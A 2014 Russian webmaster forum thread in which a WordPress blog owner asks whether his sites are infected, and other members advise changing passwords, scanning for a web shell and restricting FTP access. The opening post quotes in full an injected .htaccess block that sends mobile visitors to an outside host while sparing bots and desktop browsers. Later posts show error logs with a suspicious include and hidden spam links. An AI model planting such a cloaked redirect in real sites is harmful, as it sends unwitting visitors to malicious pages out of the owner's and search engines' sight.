Вирус на сайте или ошибка скрипта?

85

sea_dream

19 июля 2014, 19:34

4683

Проблема началась неделю назад, кто то или что то меняло постоянно .htaccess может это и раньше началось, но впервые яндекс отметил блог как опасный неделю назад в шапку файла постоянно добавлялся код:


RewriteEngine on



RewriteCond %{HTTP_USER_AGENT} android [NC,OR]

RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]

RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]

RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]

RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]

RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]

RewriteCond %{HTTP:Profile} .+ [NC,OR]

RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]

RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]

RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]

RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]



RewriteCond %{QUERY_STRING} !noredirect [NC]

RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]

RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]



RewriteRule ^(.*)$ http://ploms.net/e/17520?&mod=htaccess&dn=%{HTTP_HOST} [L,R=302]

По началу я не понимал всего, просто удалял но спустя час два все появлялось снова, связался с хостерами, изменил пароли ко всему, был у меня еще один на этом аккаунте хоста сайт с которого шли угрозы, я его удалил временно. Вроде уже пол дня изменений нет в этих файлах, да на этом аккаунте 5 сайтов и у всех ситуация одна и та же изменение шапки файла, приписывания этого кода, так вот после изменения паролей и удаления вроде все прекратилось, но смотрю логи этого мед блога, там такое непонятное буйство....

У меня куски логов за час так в них такое дикое обращение к функции файла темы. Не получается прикрепить, могу передать кому интересно и кто поможет помочь разобраться с ситуацией.


med-2013.ru [Sat Jul 19 23:25:30 2014] [error] [client 66.249.78.198] PHP Notice:  Undefined index: cperpage in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/functions.php on line 514

med-2013.ru [Sat Jul 19 23:25:30 2014] [error] [client 66.249.78.198] PHP Notice:  Undefined variable: output in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/functions.php on line 584

med-2013.ru [Sat Jul 19 23:25:30 2014] [error] [client 66.249.78.198] PHP Notice:  Undefined variable: bfix_tags in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/functions.php on line 585

med-2013.ru [Sat Jul 19 23:25:30 2014] [error] [client 66.249.78.198] PHP Notice:  Undefined variable: is_showdots in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/functions.php on line 586

med-2013.ru [Sat Jul 19 23:25:30 2014] [error] [client 66.249.78.198] PHP Notice:  Undefined variable: m_tags in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/functions.php on line 589

med-2013.ru [Sat Jul 19 23:25:30 2014] [error] [client 66.249.78.198] PHP Notice:  Undefined variable: m_tags in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/functions.php on line 592

med-2013.ru [Sat Jul 19 23:25:30 2014] [error] [client 66.249.78.198] PHP Notice:  Undefined variable: m_tags in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/functions.php on line 595

med-2013.ru [Sat Jul 19 23:25:30 2014] [error] [client 66.249.78.198] PHP Notice:  Undefined variable: post in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/functions.php on line 604

med-2013.ru [Sat Jul 19 23:25:30 2014] [error] [client 66.249.78.198] PHP Notice:  Trying to get property of non-object in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/functions.php on line 604

Это был кусок error лога

Кто хочет, ищет возможности - Блог Жидкова Александра (http://zhidcov.ru)

266

mff

19 июля 2014, 19:55

#1

Вас дрючат! Смените пароли на ftp, админку и т. д. найдите шелл.

85

sea_dream

20 июля 2014, 06:23

#2

Я вчера сменил все пароли к фтп админкам базам эти логи уже после этого, вот сейчас посмотрел файлы .htaccess не измененные, это прогресс уже, но файлы логов за ночь заметно пополнились, что дальше делать, как искать?

266

mff

20 июля 2014, 06:57

#3

sea_dream, попробуйте вот этот скрипт запустить: http://www.revisium.com/ai/

K5

209

kgtu5

20 июля 2014, 07:03

#4

против шелл-скриптов пройдитесь по всем сайтам ай-болитом, смена паролей мало чем поможет

Undefined index: cperpage in
Undefined variable: output

это не ошибки, а информация для вас как разработчика - вы не объявили переменные, функции cperpage и output (и т.д.) и места где они встречаются.

Исправьте шаблон корректно обратившись к этим переменным/функциям (что будет хорошим тоном), либо как делает большинство - забейте, скрыв настройками php вывод сообщений Notice.

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

63

Lord_Leon

20 июля 2014, 07:36

#5

sea_dream, добрый день.

Если у Вас статический ip, то ограничите доступ к сайту по ftp.

Для ограничения доступа по фтп Вам необходимо создать текстовый файл .ftpaccess в корневом каталоге.

Если вы хотите разрешить доступ только с конкретного ip-адреса, в нем нужно указать:

Allow from xx.xx.xx.xx

Deny from all

</Limit>

Где xx.xx.xx.xx – необходимый ip.

Если у Вас ip динамический, то хотя бы укажите диапазон провайдера, только будьте внимательны, чтоб себе доступ не закрыть.

Промышленный дизайн (https://aicogroup.ru/portfolio/industrial-design) корпуса для рэа | Крипозащита данных, создание сайтов (https://aicogroup.ru/portfolio/sozdanie-saytov).

85

sea_dream

20 июля 2014, 07:56

#6

Подскажите вот еще такой вопрос, у меня на двух блогах была установлена одна и та же тема (с небольшими различиями в css) на мед блоге средняя суточная посещаемость хостов 200 на втором строительном блоге небольшая 20-50 хосов, там в логах ошибок было гораздо меньше было, но тоже и все указывали на файл function.php в папке темы, я на сторой блоге с утра сменил тему и очистил файлы логов, файл error_log до сих пор пуст а в acces уже много записей


www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/gallery/elektricheskij-kamin/thumbs/thumbs_electro-kamin-1.jpg HTTP/1.1" 200 13404 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/gallery/elektricheskij-kamin/thumbs/thumbs_electro-kamin-3.jpg HTTP/1.1" 200 14231 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/gallery/elektricheskij-kamin/thumbs/thumbs_electro-kamin-4.jpg HTTP/1.1" 200 12017 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/gallery/elektricheskij-kamin/thumbs/thumbs_electro-kamin-6.jpg HTTP/1.1" 200 11671 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/gallery/elektricheskij-kamin/thumbs/thumbs_electro-kamin-5.jpg HTTP/1.1" 200 10893 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/gallery/elektricheskij-kamin/thumbs/thumbs_electro-kamin-7.jpg HTTP/1.1" 200 14563 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/gallery/elektricheskij-kamin/thumbs/thumbs_electro-kamin-8.jpg HTTP/1.1" 200 11740 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/uploads/2014/01/electro-kamin2.jpg HTTP/1.1" 200 24254 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/uploads/2014/01/electro-kamin3.jpg HTTP/1.1" 200 23354 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/uploads/2014/01/electro-kamin4.jpg HTTP/1.1" 200 23567 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:06 +0400] "GET /wp-content/uploads/2014/01/electro-kamin5.jpg HTTP/1.1" 200 30082 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 65.55.217.225 - - [20/Jul/2014:11:35:07 +0400] "GET /wp-content/uploads/2014/01/electro-kamin6.jpg HTTP/1.1" 200 19728 "http://boroda77.ru/news/2014-01-12/kamin-v-dome" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" 0

www.stroim-2014.ru 95.106.140.120 - - [20/Jul/2014:11:35:38 +0400] "GET /wp-content/gallery/drovyanoj-kamin/drova-kamin-3.jpg HTTP/1.1" 200 41910 "http://www.bing.com/images/search?q=%d0%ba%d0%b0%d0%bc%d0%b8%d0%bd%d1%8b+%d1%81%d1%80%d0%b5%d0%b4%d0%bd%d0%b5%d0%b2%d0%b5%d0%ba%d0%be%d0%b2%d1%8b%d1%85+%d0%b7%d0%b0%d0%bc%d0%ba%d0%be%d0%b2&qpvt=%d0%ba%d0%b0%d0%bc%d0%b8%d0%bd%d1%8b+%d1%81%d1%80%d0%b5%d0%b4%d0%bd%d0%b5%d0%b2%d0%b5%d0%ba%d0%be%d0%b2%d1%8b%d1%85+%d0%b7%d0%b0%d0%bc%d0%ba%d0%be%d0%b2&FORM=IGRE" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; LCJB; rv:11.0) like Gecko" 0

www.stroim-2014.ru 95.106.140.120 - - [20/Jul/2014:11:38:43 +0400] "GET /wp-content/gallery/drovyanoj-kamin/drova-kamin-6.jpg HTTP/1.1" 200 35258 "http://www.bing.com/images/search?q=%d0%ba%d0%b0%d0%bc%d0%b8%d0%bd%d1%8b+%d1%81%d1%80%d0%b5%d0%b4%d0%bd%d0%b5%d0%b2%d0%b5%d0%ba%d0%be%d0%b2%d1%8b%d1%85+%d0%b7%d0%b0%d0%bc%d0%ba%d0%be%d0%b2&qpvt=%d0%ba%d0%b0%d0%bc%d0%b8%d0%bd%d1%8b+%d1%81%d1%80%d0%b5%d0%b4%d0%bd%d0%b5%d0%b2%d0%b5%d0%ba%d0%be%d0%b2%d1%8b%d1%85+%d0%b7%d0%b0%d0%bc%d0%ba%d0%be%d0%b2&FORM=IGRE" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; LCJB; rv:11.0) like Gecko" 0

www.stroim-2014.ru 95.106.140.120 - - [20/Jul/2014:11:39:00 +0400] "GET /wp-content/gallery/drovyanoj-kamin/drova-kamin-2.jpg HTTP/1.1" 200 24180 "http://www.bing.com/images/search?q=%d0%ba%d0%b0%d0%bc%d0%b8%d0%bd%d1%8b+%d1%81%d1%80%d0%b5%d0%b4%d0%bd%d0%b5%d0%b2%d0%b5%d0%ba%d0%be%d0%b2%d1%8b%d1%85+%d0%b7%d0%b0%d0%bc%d0%ba%d0%be%d0%b2&qpvt=%d0%ba%d0%b0%d0%bc%d0%b8%d0%bd%d1%8b+%d1%81%d1%80%d0%b5%d0%b4%d0%bd%d0%b5%d0%b2%d0%b5%d0%ba%d0%be%d0%b2%d1%8b%d1%85+%d0%b7%d0%b0%d0%bc%d0%ba%d0%be%d0%b2&FORM=IGRE" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; LCJB; rv:11.0) like Gecko" 0

www.stroim-2014.ru 95.106.140.120 - - [20/Jul/2014:11:39:04 +0400] "GET /wp-content/gallery/drovyanoj-kamin/drova-kamin-5.jpg HTTP/1.1" 200 38135 "http://www.bing.com/images/search?q=%d0%ba%d0%b0%d0%bc%d0%b8%d0%bd%d1%8b+%d1%81%d1%80%d0%b5%d0%b4%d0%bd%d0%b5%d0%b2%d0%b5%d0%ba%d0%be%d0%b2%d1%8b%d1%85+%d0%b7%d0%b0%d0%bc%d0%ba%d0%be%d0%b2&qpvt=%d0%ba%d0%b0%d0%bc%d0%b8%d0%bd%d1%8b+%d1%81%d1%80%d0%b5%d0%b4%d0%bd%d0%b5%d0%b2%d0%b5%d0%ba%d0%be%d0%b2%d1%8b%d1%85+%d0%b7%d0%b0%d0%bc%d0%ba%d0%be%d0%b2&FORM=IGRE" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; LCJB; rv:11.0) like Gecko" 0

www.stroim-2014.ru 82.145.220.70 - - [20/Jul/2014:11:46:48 +0400] "GET /feed/ HTTP/1.1" 200 77896 "-" "Mozilla/4.0 (Windows 98; US) Opera 10.00 [en]" 0

www.stroim-2014.ru 82.145.220.70 - - [20/Jul/2014:11:51:53 +0400] "GET /feed/ HTTP/1.1" 200 77896 "-" "Mozilla/4.0 (Windows 98; US) Opera 10.00 [en]" 0

www.stroim-2014.ru 208.115.113.89 - - [20/Jul/2014:11:53:20 +0400] "GET /robots.txt HTTP/1.1" 200 607 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)" 0

Я плохо пока ориентируюсь в файлах логов, скажите есть причины для беспокойства?

---------- Добавлено 20.07.2014 в 11:57 ----------

Lord_Leon, нет IP динамический обращался к провайдерам интернета они даже не могут коридор сказать....

K5

209

kgtu5

20 июля 2014, 08:15

#7

access.log и должен наполняться - там все что открывают посетители: страницы, картинки, стили, яваскрипты

85

sea_dream

20 июля 2014, 09:35

#8

Вот например в error_log много однотипных записей, что они означают

data=UlNrNmk5WktYejR0eWJFYk1Ldmtxak9oQ20ta2VqRVg1Q3BqMFQxRmNYa2JRRXRnMUhlLUU0TnBieXhLVHlzUzdTYjI5N05ENFpsMkZIX0NCdnhqZVVsbS0yNjBDVWpoYjdNYXdPZ0UzeXJTNGtwSm45Qm9ZSkFCOGpPem8xWjdXd2F0S0dtVGxiVGRxZkJicWo1ZHlsWXo0bGdrdFdTQlFJdjNVWWJabV80&b64e=2&sign=0f06a8929819545016f5ac464900b81e&keyno=0&l10n=ru

med-2013.ru [Sun Jul 20 13:37:28 2014] [error] [client 77.45.243.29] PHP Warning:  include(jpg\xd0\xa0\xd0\x86\xd0\xa0\xe2\x80\x9a\xd0\xb2\xe2\x80\x9e\xd1\x9e) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/footer.php on line 3, referer: http://yandex.ru/clck/jsredir?from=yandex.ru%3Byandsearch%3Bweb%3B%3B&text=&etext=391.6RH_ghsl4Dto5xmFyuZ-atbEtNkmCBdrkhQteoZexNHrfndKC4G_qroErN7C7N9EhZY0CwVcOjZnw3k6I-UkP8yqyDbcdZKgsupVPCK8M51B7H1GGED_s-Qa9VPCDif9KztfdtENUNiMw-sQRhqe_CZY4mSGxO_vYvV-pcBXIYGHCNwgwX2-fwQhcNvpeNyDwBd19JDHgdDt6uctpYotsJNLQjy4slrpdsLxkh81sebDeb28FgqKCE6CGcyX0w_M.2fb87b94671b4f51e6c71b4cbe0b9c146f970c43&uuid=&state=AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW99KUdgowt9XsMCv5TMMN9UTQSQbnFqxRfy1qNK6_no60A8Xnc75FYukGI1uDgvxyIzYWUxG-59NACQlYqpbGicMZ4YU4PDRamRKLQyvV3ezGzLAKZrIArZFo-pfWKIFttAgn2UhCXS5Wx5RTGDQvuUm-BOJVtyW-wrMPSJkhwRHAjAOBJrn9LGkL_4AaOuBLf-_TJO4dJRtxoqF4Q3nxQ1g&data=UlNrNmk5WktYejR0eWJFYk1Ldmtxak9oQ20ta2VqRVg1Q3BqMFQxRmNYa2JRRXRnMUhlLUU0TnBieXhLVHlzUzdTYjI5N05ENFpsMkZIX0NCdnhqZVVsbS0yNjBDVWpoYjdNYXdPZ0UzeXJTNGtwSm45Qm9ZSkFCOGpPem8xWjdXd2F0S0dtVGxiVGRxZkJicWo1ZHlsWXo0bGdrdFdTQlFJdjNVWWJabV80&b64e=2&sign=0f06a8929819545016f5ac464900b81e&keyno=0&l10n=ru

med-2013.ru [Sun Jul 20 13:37:28 2014] [error] [client 77.45.243.29] PHP Warning:  include(jpg\xd0\xa0\xd0\x86\xd0\xa0\xe2\x80\x9a\xd0\xb2\xe2\x80\x9e\xd1\x9e) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/footer.php on line 3, referer: http://yandex.ru/clck/jsredir?from=yandex.ru%3Byandsearch%3Bweb%3B%3B&text=&etext=391.6RH_ghsl4Dto5xmFyuZ-atbEtNkmCBdrkhQteoZexNHrfndKC4G_qroErN7C7N9EhZY0CwVcOjZnw3k6I-UkP8yqyDbcdZKgsupVPCK8M51B7H1GGED_s-Qa9VPCDif9KztfdtENUNiMw-sQRhqe_CZY4mSGxO_vYvV-pcBXIYGHCNwgwX2-fwQhcNvpeNyDwBd19JDHgdDt6uctpYotsJNLQjy4slrpdsLxkh81sebDeb28FgqKCE6CGcyX0w_M.2fb87b94671b4f51e6c71b4cbe0b9c146f970c43&uuid=&state=AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW99KUdgowt9XsMCv5TMMN9UTQSQbnFqxRfy1qNK6_no60A8Xnc75FYukGI1uDgvxyIzYWUxG-59NACQlYqpbGicMZ4YU4PDRamRKLQyvV3ezGzLAKZrIArZFo-pfWKIFttAgn2UhCXS5Wx5RTGDQvuUm-BOJVtyW-wrMPSJkhwRHAjAOBJrn9LGkL_4AaOuBLf-_TJO4dJRtxoqF4Q3nxQ1g&data=UlNrNmk5WktYejR0eWJFYk1Ldmtxak9oQ20ta2VqRVg1Q3BqMFQxRmNYa2JRRXRnMUhlLUU0TnBieXhLVHlzUzdTYjI5N05ENFpsMkZIX0NCdnhqZVVsbS0yNjBDVWpoYjdNYXdPZ0UzeXJTNGtwSm45Qm9ZSkFCOGpPem8xWjdXd2F0S0dtVGxiVGRxZkJicWo1ZHlsWXo0bGdrdFdTQlFJdjNVWWJabV80&b64e=2&sign=0f06a8929819545016f5ac464900b81e&keyno=0&l10n=ru

med-2013.ru [Sun Jul 20 13:37:28 2014] [error] [client 77.45.243.29] PHP Warning:  include() [<a href='function.include'>function.include</a>]: Failed opening 'jpg\xd0\xa0\xd0\x86\xd0\xa0\xe2\x80\x9a\xd0\xb2\xe2\x80\x9e\xd1\x9e' for inclusion (include_path='.:/usr/share/php5:/usr/share/php') in /home/z/zhidcovru/med-2013/public_html/wp-content/themes/asteroid/footer.php on line 3, referer: http://yandex.ru/clck/jsredir?from=yandex.ru%3Byandsearch%3Bweb%3B%3B&text=&etext=391.6RH_ghsl4Dto5xmFyuZ-atbEtNkmCBdrkhQteoZexNHrfndKC4G_qroErN7C7N9EhZY0CwVcOjZnw3k6I-UkP8yqyDbcdZKgsupVPCK8M51B7H1GGED_s-Qa9VPCDif9KztfdtENUNiMw-sQRhqe_CZY4mSGxO_vYvV-pcBXIYGHCNwgwX2-fwQhcNvpeNyDwBd19JDHgdDt6uctpYotsJNLQjy4slrpdsLxkh81sebDeb28FgqKCE6CGcyX0w_M.2fb87b94671b4f51e6c71b4cbe0b9c146f970c43&uuid=&state=AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW99KUdgowt9XsMCv5TMMN9UTQSQbnFqxRfy1qNK6_no60A8Xnc75FYukGI1uDgvxyIzYWUxG-59NACQlYqpbGicMZ4YU4PDRamRKLQyvV3ezGzLAKZrIArZFo-pfWKIFttAgn2UhCXS5Wx5RTGDQvuUm-BOJVtyW-wrMPSJkhwRHAjAOBJrn9LGkL_4AaOuBLf-_TJO4dJRtxoqF4Q3nxQ1g&data=UlNrNmk5WktYejR0eWJFYk1Ldmtxak9oQ20ta2VqRVg1Q3BqMFQxRmNYa2JRRXRnMUhlLUU0TnBieXhLVHlzUzdTYjI5N05ENFpsMkZIX0NCdnhqZVVsbS0yNjBDVWpoYjdNYXdPZ0UzeXJTNGtwSm45Qm9ZSkFCOGpPem8xWjdXd2F0S0dtVGxiVGRxZkJicWo1ZHlsWXo0bGdrdFdTQlFJdjNVWWJabV80&b64e=2&sign=0f06a8929819545016f5ac464900b81e&keyno=0&l10n=ru

85

sea_dream

20 июля 2014, 11:48

#9

Сменил тему, код error_log файла совсем изменился

\xd1\x81\xd0\xb7\xd0\xb0\xd0\xb4\xd0\xb8 \xd0\xb8 \xd1\x8f \xd0\xbd\xd0\xb0\xd1\x88\xd0\xb5\xd0\xbb \xd0\xbd\xd0\xb0 <a href=\\"http://carsbetter.ru\\" target=\\"_blank\\">carsbetter.ru</a> \xd0\xba\xd0\xb0\xd0\xba \xd1\x81\xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb8\xd1\x82\xd1\x8c\xd1\x81\xd1\x8f \xd1\x81 \xd1\x8d\xd1\x82\xd0\xbe\xd0\xb9 \xd0\xbf\xd1\x80\xd0\xbe\xd0\xb1\xd0\xbb\xd0\xb5\xd0\xbc\xd0\xbe\xd0\xb9.</div> <div style=\\"display:none;\\">\xd0\x9f\xd0\xbe\xd0\xbf\xd1\x80\xd0\xbe\xd0\xb1\xd1\x83\xd0\xb9 \xd0\xbf\xd0\xbe\xd1\x87\xd0\xb8\xd1\x82\xd0\xb0\xd1\x82\xd1\x8c \xd0\xbd\xd0\xb0 \xd0\xbf\xd0\xbe\xd1\x80\xd1\x82\xd

